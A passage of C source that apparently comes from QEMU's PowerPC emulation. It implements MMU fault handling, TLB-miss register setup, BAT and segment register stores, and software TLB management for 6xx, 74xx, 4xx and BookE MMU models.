int mmu_idx) { uint32_t epid; bool as, pr; uint32_t missed_tid = 0; bool use_epid = mmubooke206_get_as(env, mmu_idx, &epid, &as, &pr); if (rw == 2) { as = msr_ir; } env->spr[SPR_BOOKE_MAS0] = env->spr[SPR_BOOKE_MAS4] & MAS4_TLBSELD_MASK; env->spr[SPR_BOOKE_MAS1] = env->spr[SPR_BOOKE_MAS4] & MAS4_TSIZED_MASK; env->spr[SPR_BOOKE_MAS2] = env->spr[SPR_BOOKE_MAS4] & MAS4_WIMGED_MASK; env->spr[SPR_BOOKE_MAS3] = 0; env->spr[SPR_BOOKE_MAS6] = 0; env->spr[SPR_BOOKE_MAS7] = 0; /* AS */ if (as) { env->spr[SPR_BOOKE_MAS1] |= MAS1_TS; env->spr[SPR_BOOKE_MAS6] |= MAS6_SAS; } env->spr[SPR_BOOKE_MAS1] |= MAS1_VALID; env->spr[SPR_BOOKE_MAS2] |= address & MAS2_EPN_MASK; if (!use_epid) { switch (env->spr[SPR_BOOKE_MAS4] & MAS4_TIDSELD_PIDZ) { case MAS4_TIDSELD_PID0: missed_tid = env->spr[SPR_BOOKE_PID]; break; case MAS4_TIDSELD_PID1: missed_tid = env->spr[SPR_BOOKE_PID1]; break; case MAS4_TIDSELD_PID2: missed_tid = env->spr[SPR_BOOKE_PID2]; break; } env->spr[SPR_BOOKE_MAS6] |= env->spr[SPR_BOOKE_PID] << 16; } else { missed_tid = epid; env->spr[SPR_BOOKE_MAS6] |= missed_tid << 16; } env->spr[SPR_BOOKE_MAS1] |= (missed_tid << MAS1_TID_SHIFT); /* next victim logic */ env->spr[SPR_BOOKE_MAS0] |= env->last_way << MAS0_ESEL_SHIFT; env->last_way++; env->last_way &= booke206_tlb_ways(env, 0) - 1; env->spr[SPR_BOOKE_MAS0] |= env->last_way << MAS0_NV_SHIFT; } /* Perform address translation */ static int cpu_ppc_handle_mmu_fault(CPUPPCState *env, target_ulong address, int rw, int mmu_idx) { CPUState *cs = env_cpu(env); PowerPCCPU *cpu = POWERPC_CPU(cs); mmu_ctx_t ctx; int access_type; int ret = 0; if (rw == 2) { /* code access */ rw = 0; access_type = ACCESS_CODE; } else { /* data access */ access_type = env->access_type; } ret = get_physical_address_wtlb(env, &ctx, address, rw, access_type, mmu_idx); if (ret == 0) { tlb_set_page(cs, address & TARGET_PAGE_MASK, ctx.raddr & TARGET_PAGE_MASK, ctx.prot, mmu_idx, TARGET_PAGE_SIZE); ret = 0; } else if (ret < 0) { LOG_MMU_STATE(cs); if (access_type == ACCESS_CODE) { switch (ret) { case -1: /* No matches in page tables or TLB */ switch (env->mmu_model) { case POWERPC_MMU_SOFT_6xx: cs->exception_index = POWERPC_EXCP_IFTLB; env->error_code = 1 << 18; env->spr[SPR_IMISS] = address; env->spr[SPR_ICMP] = 0x80000000 | ctx.ptem; goto tlb_miss; case POWERPC_MMU_SOFT_74xx: cs->exception_index = POWERPC_EXCP_IFTLB; goto tlb_miss_74xx; case POWERPC_MMU_SOFT_4xx: case POWERPC_MMU_SOFT_4xx_Z: cs->exception_index = POWERPC_EXCP_ITLB; env->error_code = 0; env->spr[SPR_40x_DEAR] = address; env->spr[SPR_40x_ESR] = 0x00000000; break; case POWERPC_MMU_BOOKE206: booke206_update_mas_tlb_miss(env, address, 2, mmu_idx); /* fall through 
*/ case POWERPC_MMU_BOOKE: cs->exception_index = POWERPC_EXCP_ITLB; env->error_code = 0; env->spr[SPR_BOOKE_DEAR] = address; env->spr[SPR_BOOKE_ESR] = mmubooke206_esr(mmu_idx, 0); return -1; case POWERPC_MMU_MPC8xx: /* XXX: TODO */ cpu_abort(cs, "MPC8xx MMU model is not implemented\n"); break; case POWERPC_MMU_REAL: cpu_abort(cs, "PowerPC in real mode should never raise " "any MMU exceptions\n"); return -1; default: cpu_abort(cs, "Unknown or invalid MMU model\n"); return -1; } break; case -2: /* Access rights violation */ cs->exception_index = POWERPC_EXCP_ISI; env->error_code = 0x08000000; break; case -3: /* No execute protection violation */ if ((env->mmu_model == POWERPC_MMU_BOOKE) || (env->mmu_model == POWERPC_MMU_BOOKE206)) { env->spr[SPR_BOOKE_ESR] = 0x00000000; } cs->exception_index = POWERPC_EXCP_ISI; env->error_code = 0x10000000; break; case -4: /* Direct store exception */ /* No code fetch is allowed in direct-store areas */ cs->exception_index = POWERPC_EXCP_ISI; env->error_code = 0x10000000; break; } } else { switch (ret) { case -1: /* No matches in page tables or TLB */ switch (env->mmu_model) { case POWERPC_MMU_SOFT_6xx: if (rw == 1) { cs->exception_index = POWERPC_EXCP_DSTLB; env->error_code = 1 << 16; } else { cs->exception_index = POWERPC_EXCP_DLTLB; env->error_code = 0; } env->spr[SPR_DMISS] = address; env->spr[SPR_DCMP] = 0x80000000 | ctx.ptem; tlb_miss: env->error_code |= ctx.key << 19; env->spr[SPR_HASH1] = ppc_hash32_hpt_base(cpu) + get_pteg_offset32(cpu, ctx.hash[0]); env->spr[SPR_HASH2] = ppc_hash32_hpt_base(cpu) + get_pteg_offset32(cpu, ctx.hash[1]); break; case POWERPC_MMU_SOFT_74xx: if (rw == 1) { cs->exception_index = POWERPC_EXCP_DSTLB; } else { cs->exception_index = POWERPC_EXCP_DLTLB; } tlb_miss_74xx: /* Implement LRU algorithm */ env->error_code = ctx.key << 19; env->spr[SPR_TLBMISS] = (address & ~((target_ulong)0x3)) | ((env->last_way + 1) & (env->nb_ways - 1)); env->spr[SPR_PTEHI] = 0x80000000 | ctx.ptem; break; case POWERPC_MMU_SOFT_4xx: case POWERPC_MMU_SOFT_4xx_Z: cs->exception_index = POWERPC_EXCP_DTLB; env->error_code = 0; env->spr[SPR_40x_DEAR] = address; if (rw) { env->spr[SPR_40x_ESR] = 0x00800000; } else { env->spr[SPR_40x_ESR] = 0x00000000; } break; case POWERPC_MMU_MPC8xx: /* XXX: TODO */ cpu_abort(cs, "MPC8xx MMU model is not implemented\n"); break; case POWERPC_MMU_BOOKE206: booke206_update_mas_tlb_miss(env, address, rw, mmu_idx); /* fall through */ case POWERPC_MMU_BOOKE: cs->exception_index = POWERPC_EXCP_DTLB; env->error_code = 0; env->spr[SPR_BOOKE_DEAR] = address; env->spr[SPR_BOOKE_ESR] = mmubooke206_esr(mmu_idx, rw); return -1; case POWERPC_MMU_REAL: cpu_abort(cs, "PowerPC in real mode should never raise " "any MMU exceptions\n"); return -1; default: cpu_abort(cs, "Unknown or invalid MMU model\n"); return -1; } break; case -2: /* Access rights violation */ cs->exception_index = POWERPC_EXCP_DSI; env->error_code = 0; if (env->mmu_model == POWERPC_MMU_SOFT_4xx || env->mmu_model == POWERPC_MMU_SOFT_4xx_Z) { env->spr[SPR_40x_DEAR] = address; if (rw) { env->spr[SPR_40x_ESR] |= 0x00800000; } } else if ((env->mmu_model == POWERPC_MMU_BOOKE) || (env->mmu_model == POWERPC_MMU_BOOKE206)) { env->spr[SPR_BOOKE_DEAR] = address; env->spr[SPR_BOOKE_ESR] = mmubooke206_esr(mmu_idx, rw); } else { env->spr[SPR_DAR] = address; if (rw == 1) { env->spr[SPR_DSISR] = 0x0A000000; } else { env->spr[SPR_DSISR] = 0x08000000; } } break; case -4: /* Direct store exception */ switch (access_type) { case ACCESS_FLOAT: /* Floating point load/store */ 
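                /*
                 * A floating point load/store to a direct-store segment
                 * raises an alignment interrupt rather than a DSI; DAR
                 * still reports the faulting effective address.
                 */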
cs->exception_index = POWERPC_EXCP_ALIGN; env->error_code = POWERPC_EXCP_ALIGN_FP; env->spr[SPR_DAR] = address; break; case ACCESS_RES: /* lwarx, ldarx or stwcx. */ cs->exception_index = POWERPC_EXCP_DSI; env->error_code = 0; env->spr[SPR_DAR] = address; if (rw == 1) { env->spr[SPR_DSISR] = 0x06000000; } else { env->spr[SPR_DSISR] = 0x04000000; } break; case ACCESS_EXT: /* eciwx or ecowx */ cs->exception_index = POWERPC_EXCP_DSI; env->error_code = 0; env->spr[SPR_DAR] = address; if (rw == 1) { env->spr[SPR_DSISR] = 0x06100000; } else { env->spr[SPR_DSISR] = 0x04100000; } break; default: printf("DSI: invalid exception (%d)\n", ret); cs->exception_index = POWERPC_EXCP_PROGRAM; env->error_code = POWERPC_EXCP_INVAL | POWERPC_EXCP_INVAL_INVAL; env->spr[SPR_DAR] = address; break; } break; } } ret = 1; } return ret; } /*****************************************************************************/ /* BATs management */ #if !defined(FLUSH_ALL_TLBS) static inline void do_invalidate_BAT(CPUPPCState *env, target_ulong BATu, target_ulong mask) { CPUState *cs = env_cpu(env); target_ulong base, end, page; base = BATu & ~0x0001FFFF; end = base + mask + 0x00020000; if (((end - base) >> TARGET_PAGE_BITS) > 1024) { /* Flushing 1024 4K pages is slower than a complete flush */ LOG_BATS("Flush all BATs\n"); tlb_flush(CPU(cs)); LOG_BATS("Flush done\n"); return; } LOG_BATS("Flush BAT from " TARGET_FMT_lx " to " TARGET_FMT_lx " (" TARGET_FMT_lx ")\n", base, end, mask); for (page = base; page != end; page += TARGET_PAGE_SIZE) { tlb_flush_page(cs, page); } LOG_BATS("Flush done\n"); } #endif static inline void dump_store_bat(CPUPPCState *env, char ID, int ul, int nr, target_ulong value) { LOG_BATS("Set %cBAT%d%c to " TARGET_FMT_lx " (" TARGET_FMT_lx ")\n", ID, nr, ul == 0 ? 'u' : 'l', value, env->nip); } void helper_store_ibatu(CPUPPCState *env, uint32_t nr, target_ulong value) { target_ulong mask; #if defined(FLUSH_ALL_TLBS) PowerPCCPU *cpu = env_archcpu(env); #endif dump_store_bat(env, 'I', 0, nr, value); if (env->IBAT[0][nr] != value) { mask = (value << 15) & 0x0FFE0000UL; #if !defined(FLUSH_ALL_TLBS) do_invalidate_BAT(env, env->IBAT[0][nr], mask); #endif /* * When storing valid upper BAT, mask BEPI and BRPN and * invalidate all TLBs covered by this BAT */ mask = (value << 15) & 0x0FFE0000UL; env->IBAT[0][nr] = (value & 0x00001FFFUL) | (value & ~0x0001FFFFUL & ~mask); env->IBAT[1][nr] = (env->IBAT[1][nr] & 0x0000007B) | (env->IBAT[1][nr] & ~0x0001FFFF & ~mask); #if !defined(FLUSH_ALL_TLBS) do_invalidate_BAT(env, env->IBAT[0][nr], mask); #else tlb_flush(env_cpu(env)); #endif } } void helper_store_ibatl(CPUPPCState *env, uint32_t nr, target_ulong value) { dump_store_bat(env, 'I', 1, nr, value); env->IBAT[1][nr] = value; } void helper_store_dbatu(CPUPPCState *env, uint32_t nr, target_ulong value) { target_ulong mask; #if defined(FLUSH_ALL_TLBS) PowerPCCPU *cpu = env_archcpu(env); #endif dump_store_bat(env, 'D', 0, nr, value); if (env->DBAT[0][nr] != value) { /* * When storing valid upper BAT, mask BEPI and BRPN and * invalidate all TLBs covered by this BAT */ mask = (value << 15) & 0x0FFE0000UL; #if !defined(FLUSH_ALL_TLBS) do_invalidate_BAT(env, env->DBAT[0][nr], mask); #endif mask = (value << 15) & 0x0FFE0000UL; env->DBAT[0][nr] = (value & 0x00001FFFUL) | (value & ~0x0001FFFFUL & ~mask); env->DBAT[1][nr] = (env->DBAT[1][nr] & 0x0000007B) | (env->DBAT[1][nr] & ~0x0001FFFF & ~mask); #if !defined(FLUSH_ALL_TLBS) do_invalidate_BAT(env, env->DBAT[0][nr], mask); #else tlb_flush(env_cpu(env)); #endif } } void 
helper_store_dbatl(CPUPPCState *env, uint32_t nr, target_ulong value) { dump_store_bat(env, 'D', 1, nr, value); env->DBAT[1][nr] = value; } void helper_store_601_batu(CPUPPCState *env, uint32_t nr, target_ulong value) { target_ulong mask; #if defined(FLUSH_ALL_TLBS) PowerPCCPU *cpu = env_archcpu(env); int do_inval; #endif dump_store_bat(env, 'I', 0, nr, value); if (env->IBAT[0][nr] != value) { #if defined(FLUSH_ALL_TLBS) do_inval = 0; #endif mask = (env->IBAT[1][nr] << 17) & 0x0FFE0000UL; if (env->IBAT[1][nr] & 0x40) { /* Invalidate BAT only if it is valid */ #if !defined(FLUSH_ALL_TLBS) do_invalidate_BAT(env, env->IBAT[0][nr], mask); #else do_inval = 1; #endif } /* * When storing valid upper BAT, mask BEPI and BRPN and * invalidate all TLBs covered by this BAT */ env->IBAT[0][nr] = (value & 0x00001FFFUL) | (value & ~0x0001FFFFUL & ~mask); env->DBAT[0][nr] = env->IBAT[0][nr]; if (env->IBAT[1][nr] & 0x40) { #if !defined(FLUSH_ALL_TLBS) do_invalidate_BAT(env, env->IBAT[0][nr], mask); #else do_inval = 1; #endif } #if defined(FLUSH_ALL_TLBS) if (do_inval) { tlb_flush(env_cpu(env)); } #endif } } void helper_store_601_batl(CPUPPCState *env, uint32_t nr, target_ulong value) { #if !defined(FLUSH_ALL_TLBS) target_ulong mask; #else PowerPCCPU *cpu = env_archcpu(env); int do_inval; #endif dump_store_bat(env, 'I', 1, nr, value); if (env->IBAT[1][nr] != value) { #if defined(FLUSH_ALL_TLBS) do_inval = 0; #endif if (env->IBAT[1][nr] & 0x40) { #if !defined(FLUSH_ALL_TLBS) mask = (env->IBAT[1][nr] << 17) & 0x0FFE0000UL; do_invalidate_BAT(env, env->IBAT[0][nr], mask); #else do_inval = 1; #endif } if (value & 0x40) { #if !defined(FLUSH_ALL_TLBS) mask = (value << 17) & 0x0FFE0000UL; do_invalidate_BAT(env, env->IBAT[0][nr], mask); #else do_inval = 1; #endif } env->IBAT[1][nr] = value; env->DBAT[1][nr] = value; #if defined(FLUSH_ALL_TLBS) if (do_inval) { tlb_flush(env_cpu(env)); } #endif } } /*****************************************************************************/ /* TLB management */ void ppc_tlb_invalidate_all(CPUPPCState *env) { #if defined(TARGET_PPC64) if (env->mmu_model & POWERPC_MMU_64) { env->tlb_need_flush = 0; tlb_flush(env_cpu(env)); } else #endif /* defined(TARGET_PPC64) */ switch (env->mmu_model) { case POWERPC_MMU_SOFT_6xx: case POWERPC_MMU_SOFT_74xx: ppc6xx_tlb_invalidate_all(env); break; case POWERPC_MMU_SOFT_4xx: case POWERPC_MMU_SOFT_4xx_Z: ppc4xx_tlb_invalidate_all(env); break; case POWERPC_MMU_REAL: cpu_abort(env_cpu(env), "No TLB for PowerPC 4xx in real mode\n"); break; case POWERPC_MMU_MPC8xx: /* XXX: TODO */ cpu_abort(env_cpu(env), "MPC8xx MMU model is not implemented\n"); break; case POWERPC_MMU_BOOKE: tlb_flush(env_cpu(env)); break; case POWERPC_MMU_BOOKE206: booke206_flush_tlb(env, -1, 0); break; case POWERPC_MMU_32B: case POWERPC_MMU_601: env->tlb_need_flush = 0; tlb_flush(env_cpu(env)); break; default: /* XXX: TODO */ cpu_abort(env_cpu(env), "Unknown MMU model %x\n", env->mmu_model); break; } } void ppc_tlb_invalidate_one(CPUPPCState *env, target_ulong addr) { #if !defined(FLUSH_ALL_TLBS) addr &= TARGET_PAGE_MASK; #if defined(TARGET_PPC64) if (env->mmu_model & POWERPC_MMU_64) { /* tlbie invalidate TLBs for all segments */ /* * XXX: given the fact that there are too many segments to invalidate, * and we still don't have a tlb_flush_mask(env, n, mask) in QEMU, * we just invalidate all TLBs */ env->tlb_need_flush |= TLB_NEED_LOCAL_FLUSH; } else #endif /* defined(TARGET_PPC64) */ switch (env->mmu_model) { case POWERPC_MMU_SOFT_6xx: case POWERPC_MMU_SOFT_74xx: 
ppc6xx_tlb_invalidate_virt(env, addr, 0);
        if (env->id_tlbs == 1) {
            ppc6xx_tlb_invalidate_virt(env, addr, 1);
        }
        break;
    case POWERPC_MMU_32B:
    case POWERPC_MMU_601:
        /*
         * Actual CPUs invalidate entire congruence classes based on
         * the geometry of their TLBs and some OSes take that into
         * account, we just mark the TLB to be flushed later (context
         * synchronizing event or sync instruction on 32-bit).
         */
        env->tlb_need_flush |= TLB_NEED_LOCAL_FLUSH;
        break;
    default:
        /* Should never reach here with other MMU models */
        assert(0);
    }
#else
    ppc_tlb_invalidate_all(env);
#endif
}

/*****************************************************************************/
/* Special registers manipulation */

void ppc_store_sdr1(CPUPPCState *env, target_ulong value)
{
#if 0
    PowerPCCPU *cpu = env_archcpu(env);
    qemu_log_mask(CPU_LOG_MMU, "%s: " TARGET_FMT_lx "\n", __func__, value);
    assert(!cpu->vhyp);
#endif
#if defined(TARGET_PPC64)
    if (env->mmu_model & POWERPC_MMU_64) {
        target_ulong sdr_mask = SDR_64_HTABORG | SDR_64_HTABSIZE;
        target_ulong htabsize = value & SDR_64_HTABSIZE;

        if (value & ~sdr_mask) {
#if 0
            error_report("Invalid bits 0x"TARGET_FMT_lx" set in SDR1",
                         value & ~sdr_mask);
#endif
            value &= sdr_mask;
        }
        if (htabsize > 28) {
#if 0
            error_report("Invalid HTABSIZE 0x" TARGET_FMT_lx" stored in SDR1",
                         htabsize);
#endif
            return;
        }
    }
#endif /* defined(TARGET_PPC64) */
    /* FIXME: Should check for valid HTABMASK values in 32-bit case */
    env->spr[SPR_SDR1] = value;
}

#if defined(TARGET_PPC64)
void ppc_store_ptcr(CPUPPCState *env, target_ulong value)
{
#if 0
    PowerPCCPU *cpu = env_archcpu(env);
#endif
    target_ulong ptcr_mask = PTCR_PATB | PTCR_PATS;
    target_ulong patbsize = value & PTCR_PATS;

#if 0
    qemu_log_mask(CPU_LOG_MMU, "%s: " TARGET_FMT_lx "\n", __func__, value);
    assert(!cpu->vhyp);
#endif
    assert(env->mmu_model & POWERPC_MMU_3_00);

    if (value & ~ptcr_mask) {
#if 0
        error_report("Invalid bits 0x"TARGET_FMT_lx" set in PTCR",
                     value & ~ptcr_mask);
#endif
        value &= ptcr_mask;
    }

    if (patbsize > 24) {
#if 0
        error_report("Invalid Partition Table size 0x" TARGET_FMT_lx
                     " stored in PTCR", patbsize);
#endif
        return;
    }

    env->spr[SPR_PTCR] = value;
}
#endif /* defined(TARGET_PPC64) */

/* Segment registers load and store */
target_ulong helper_load_sr(CPUPPCState *env, target_ulong sr_num)
{
#if defined(TARGET_PPC64)
    if (env->mmu_model & POWERPC_MMU_64) {
        /* XXX */
        return 0;
    }
#endif
    return env->sr[sr_num];
}

void helper_store_sr(CPUPPCState *env, target_ulong srnum, target_ulong value)
{
#if 0
    qemu_log_mask(CPU_LOG_MMU,
                  "%s: reg=%d " TARGET_FMT_lx " " TARGET_FMT_lx "\n", __func__,
                  (int)srnum, value, env->sr[srnum]);
#endif
#if defined(TARGET_PPC64)
    if (env->mmu_model & POWERPC_MMU_64) {
        PowerPCCPU *cpu = env_archcpu(env);
        uint64_t esid, vsid;

        /* ESID = srnum */
        esid = ((uint64_t)(srnum & 0xf) << 28) | SLB_ESID_V;

        /* VSID = VSID */
        vsid = (value & 0xfffffff) << 12;
        /* flags = flags */
        vsid |= ((value >> 27) & 0xf) << 8;

        ppc_store_slb(cpu, srnum, esid, vsid);
    } else
#endif
    if (env->sr[srnum] != value) {
        env->sr[srnum] = value;
        /*
         * Invalidating 256MB of virtual memory in 4kB pages takes far
         * longer than flushing the whole TLB.
         */
#if !defined(FLUSH_ALL_TLBS) && 0
        {
            target_ulong page, end;
            /* Invalidate 256 MB of virtual memory */
            page = (16 << 20) * srnum;
            end = page + (16 << 20);
            for (; page != end; page += TARGET_PAGE_SIZE) {
                tlb_flush_page(env_cpu(env), page);
            }
        }
#else
        env->tlb_need_flush |= TLB_NEED_LOCAL_FLUSH;
#endif
    }
}
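/*
 * Worked example (illustrative sketch with made-up values, not part of the
 * original helper): the 64-bit path of helper_store_sr() above re-encodes a
 * legacy segment register store as an SLB entry. For srnum = 3 and
 * value = 0x00000123:
 *
 *     esid = ((uint64_t)(3 & 0xf) << 28) | SLB_ESID_V
 *          = 0x30000000 | SLB_ESID_V        (256MB segment number 3)
 *     vsid = (0x123 & 0xfffffff) << 12
 *          = 0x123000                       (low 28 bits become the VSID)
 *     vsid |= ((0x123 >> 27) & 0xf) << 8    (protection/flag bits, 0 here)
 *
 * so every 32-bit SR write turns into one SLB entry covering its 256MB
 * segment.
 */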
/* TLB management */
void helper_tlbia(CPUPPCState *env)
{
    ppc_tlb_invalidate_all(env);
}

void helper_tlbie(CPUPPCState *env, target_ulong addr)
{
    ppc_tlb_invalidate_one(env, addr);
}

void helper_tlbiva(CPUPPCState *env, target_ulong addr)
{
    /* tlbiva instruction only exists on BookE */
    assert(env->mmu_model == POWERPC_MMU_BOOKE);
    /* XXX: TODO */
    cpu_abort(env_cpu(env), "BookE MMU model is not implemented\n");
}

/* Software driven TLBs management */
/* PowerPC 602/603 software TLB load instructions helpers */
static void do_6xx_tlb(CPUPPCState *env, target_ulong new_EPN, int is_code)
{
    target_ulong RPN, CMP, EPN;
    int way;

    RPN = env->spr[SPR_RPA];
    if (is_code) {
        CMP = env->spr[SPR_ICMP];
        EPN = env->spr[SPR_IMISS];
    } else {
        CMP = env->spr[SPR_DCMP];
        EPN = env->spr[SPR_DMISS];
    }
    way = (env->spr[SPR_SRR1] >> 17) & 1;
    (void)EPN; /* avoid a compiler warning */
#if 0
    LOG_SWTLB("%s: EPN " TARGET_FMT_lx " " TARGET_FMT_lx " PTE0 " TARGET_FMT_lx
              " PTE1 " TARGET_FMT_lx " way %d\n", __func__, new_EPN, EPN, CMP,
              RPN, way);
#endif
    /* Store this TLB */
    ppc6xx_tlb_store(env, (uint32_t)(new_EPN & TARGET_PAGE_MASK), way, is_code,
                     CMP, RPN);
}

void helper_6xx_tlbd(CPUPPCState *env, target_ulong EPN)
{
    do_6xx_tlb(env, EPN, 0);
}

void helper_6xx_tlbi(CPUPPCState *env, target_ulong EPN)
{
    do_6xx_tlb(env, EPN, 1);
}

/* PowerPC 74xx software TLB load instructions helpers */
static void do_74xx_tlb(CPUPPCState *env, target_ulong new_EPN, int is_code)
{
    target_ulong RPN, CMP, EPN;
    int way;

    RPN = env->spr[SPR_PTELO];
    CMP = env->spr[SPR_PTEHI];
    EPN = env->spr[SPR_TLBMISS] & ~0x3;
    way = env->spr[SPR_TLBMISS] & 0x3;
    (void)EPN; /* avoid a compiler warning */
    LOG_SWTLB("%s: EPN " TARGET_FMT_lx " " TARGET_FMT_lx " PTE0 " TARGET_FMT_lx
              " PTE1 " TARGET_FMT_lx " way %d\n", __func__, new_EPN, EPN, CMP,
              RPN, way);
    /* Store this TLB */
    ppc6xx_tlb_store(env, (uint32_t)(new_EPN & TARGET_PAGE_MASK), way, is_code,
                     CMP, RPN);
}

void helper_74xx_tlbd(CPUPPCState *env, target_ulong EPN)
{
    do_74xx_tlb(env, EPN, 0);
}

void helper_74xx_tlbi(CPUPPCState *env, target_ulong EPN)
{
    do_74xx_tlb(env, EPN, 1);
}

/*****************************************************************************/
/* PowerPC 601 specific instructions (POWER bridge) */

target_ulong helper_rac(CPUPPCState *env, target_ulong addr)
{
    mmu_ctx_t ctx;
    int nb_BATs;
    target_ulong ret = 0;

    /*
     * We don't have to generate many instances of this instruction,
     * as rac is supervisor only.
* * XXX: FIX THIS: Pretend we have no BAT */ nb_BATs = env->nb_BATs; env->nb_BATs = 0; if (get_physical_address(env, &ctx, addr, 0, ACCESS_INT) == 0) { ret = ctx.raddr; } env->nb_BATs = nb_BATs; return ret; } static inline target_ulong booke_tlb_to_page_size(int size) { return 1024 << (2 * size); } static inline int booke_page_size_to_tlb(target_ulong page_size) { int size; switch (page_size) { case 0x00000400UL: size = 0x0; break; case 0x00001000UL: size = 0x1; break; case 0x00004000UL: size = 0x2; break; case 0x00010000UL: size = 0x3; break; case 0x00040000UL: size = 0x4; break; case 0x00100000UL: size = 0x5; break; case 0x00400000UL: size = 0x6; break; case 0x01000000UL: size = 0x7; break; case 0x04000000UL: size = 0x8; break; case 0x10000000UL: size = 0x9; break; case 0x40000000UL: size = 0xA; break; #if defined(TARGET_PPC64) case 0x000100000000ULL: size = 0xB; break; case 0x000400000000ULL: size = 0xC; break; case 0x001000000000ULL: size = 0xD; break; case 0x004000000000ULL: size = 0xE; break; case 0x010000000000ULL: size = 0xF; break; #endif default: size = -1; break; } return size; } /* Helpers for 4xx TLB management */ #define PPC4XX_TLB_ENTRY_MASK 0x0000003f /* Mask for 64 TLB entries */ #define PPC4XX_TLBHI_V 0x00000040 #define PPC4XX_TLBHI_E 0x00000020 #define PPC4XX_TLBHI_SIZE_MIN 0 #define PPC4XX_TLBHI_SIZE_MAX 7 #define PPC4XX_TLBHI_SIZE_DEFAULT 1 #define PPC4XX_TLBHI_SIZE_SHIFT 7 #define PPC4XX_TLBHI_SIZE_MASK 0x00000007 #define PPC4XX_TLBLO_EX 0x00000200 #define PPC4XX_TLBLO_WR 0x00000100 #define PPC4XX_TLBLO_ATTR_MASK 0x000000FF #define PPC4XX_TLBLO_RPN_MASK 0xFFFFFC00 target_ulong helper_4xx_tlbre_hi(CPUPPCState *env, target_ulong entry) { ppcemb_tlb_t *tlb; target_ulong ret; int size; entry &= PPC4XX_TLB_ENTRY_MASK; tlb = &env->tlb.tlbe[entry]; ret = tlb->EPN; if (tlb->prot & PAGE_VALID) { ret |= PPC4XX_TLBHI_V; } size = booke_page_size_to_tlb(tlb->size); if (size < PPC4XX_TLBHI_SIZE_MIN || size > PPC4XX_TLBHI_SIZE_MAX) { size = PPC4XX_TLBHI_SIZE_DEFAULT; } ret |= size << PPC4XX_TLBHI_SIZE_SHIFT; env->spr[SPR_40x_PID] = tlb->PID; return ret; } target_ulong helper_4xx_tlbre_lo(CPUPPCState *env, target_ulong entry) { ppcemb_tlb_t *tlb; target_ulong ret; entry &= PPC4XX_TLB_ENTRY_MASK; tlb = &env->tlb.tlbe[entry]; ret = tlb->RPN; if (tlb->prot & PAGE_EXEC) { ret |= PPC4XX_TLBLO_EX; } if (tlb->prot & PAGE_WRITE) { ret |= PPC4XX_TLBLO_WR; } return ret; } void helper_4xx_tlbwe_hi(CPUPPCState *env, target_ulong entry, target_ulong val) { CPUState *cs = env_cpu(env); ppcemb_tlb_t *tlb; target_ulong page, end; LOG_SWTLB("%s entry %d val " TARGET_FMT_lx "\n", __func__, (int)entry, val); entry &= PPC4XX_TLB_ENTRY_MASK; tlb = &env->tlb.tlbe[entry]; /* Invalidate previous TLB (if it's valid) */ if (tlb->prot & PAGE_VALID) { end = tlb->EPN + tlb->size; LOG_SWTLB("%s: invalidate old TLB %d start " TARGET_FMT_lx " end " TARGET_FMT_lx "\n", __func__, (int)entry, tlb->EPN, end); for (page = tlb->EPN; page < end; page += TARGET_PAGE_SIZE) { tlb_flush_page(cs, page); } } tlb->size = booke_tlb_to_page_size((val >> PPC4XX_TLBHI_SIZE_SHIFT) & PPC4XX_TLBHI_SIZE_MASK); /* * We cannot handle TLB size < TARGET_PAGE_SIZE. 
* If this ever occurs, we should implement TARGET_PAGE_BITS_VARY */ if ((val & PPC4XX_TLBHI_V) && tlb->size < TARGET_PAGE_SIZE) { cpu_abort(cs, "TLB size " TARGET_FMT_lu " < %u " "are not supported (%d)\n" "Please implement TARGET_PAGE_BITS_VARY\n", tlb->size, TARGET_PAGE_SIZE, (int)((val >> 7) & 0x7)); } tlb->EPN = val & ~(tlb->size - 1); if (val & PPC4XX_TLBHI_V) { tlb->prot |= PAGE_VALID; if (val & PPC4XX_TLBHI_E) { /* XXX: TO BE FIXED */ cpu_abort(cs, "Little-endian TLB entries are not supported by now\n"); } } else { tlb->prot &= ~PAGE_VALID; } tlb->PID = env->spr[SPR_40x_PID]; /* PID */ LOG_SWTLB("%s: set up TLB %d RPN " TARGET_FMT_plx " EPN " TARGET_FMT_lx " size " TARGET_FMT_lx " prot %c%c%c%c PID %d\n", __func__, (int)entry, tlb->RPN, tlb->EPN, tlb->size, tlb->prot & PAGE_READ ? 'r' : '-', tlb->prot & PAGE_WRITE ? 'w' : '-', tlb->prot & PAGE_EXEC ? 'x' : '-', tlb->prot & PAGE_VALID ? 'v' : '-', (int)tlb->PID); /* Invalidate new TLB (if valid) */ if (tlb->prot & PAGE_VALID) { end = tlb->EPN + tlb->size; LOG_SWTLB("%s: invalidate TLB %d start " TARGET_FMT_lx " end " TARGET_FMT_lx "\n", __func__, (int)entry, tlb->EPN, end); for (page = tlb->EPN; page < end; page += TARGET_PAGE_SIZE) { tlb_flush_page(cs, page); } } } void helper_4xx_tlbwe_lo(CPUPPCState *env, target_ulong entry, target_ulong val) { ppcemb_tlb_t *tlb; LOG_SWTLB("%s entry %i val " TARGET_FMT_lx "\n", __func__, (int)entry, val); entry &= PPC4XX_TLB_ENTRY_MASK; tlb = &env->tlb.tlbe[entry]; tlb->attr = val & PPC4XX_TLBLO_ATTR_MASK; tlb->RPN = val & PPC4XX_TLBLO_RPN_MASK; tlb->prot = PAGE_READ; if (val & PPC4XX_TLBLO_EX) { tlb->prot |= PAGE_EXEC; } if (val & PPC4XX_TLBLO_WR) { tlb->prot |= PAGE_WRITE; } LOG_SWTLB("%s: set up TLB %d RPN " TARGET_FMT_plx " EPN " TARGET_FMT_lx " size " TARGET_FMT_lx " prot %c%c%c%c PID %d\n", __func__, (int)entry, tlb->RPN, tlb->EPN, tlb->size, tlb->prot & PAGE_READ ? 'r' : '-', tlb->prot & PAGE_WRITE ? 'w' : '-', tlb->prot & PAGE_EXEC ? 'x' : '-', tlb->prot & PAGE_VALID ? 
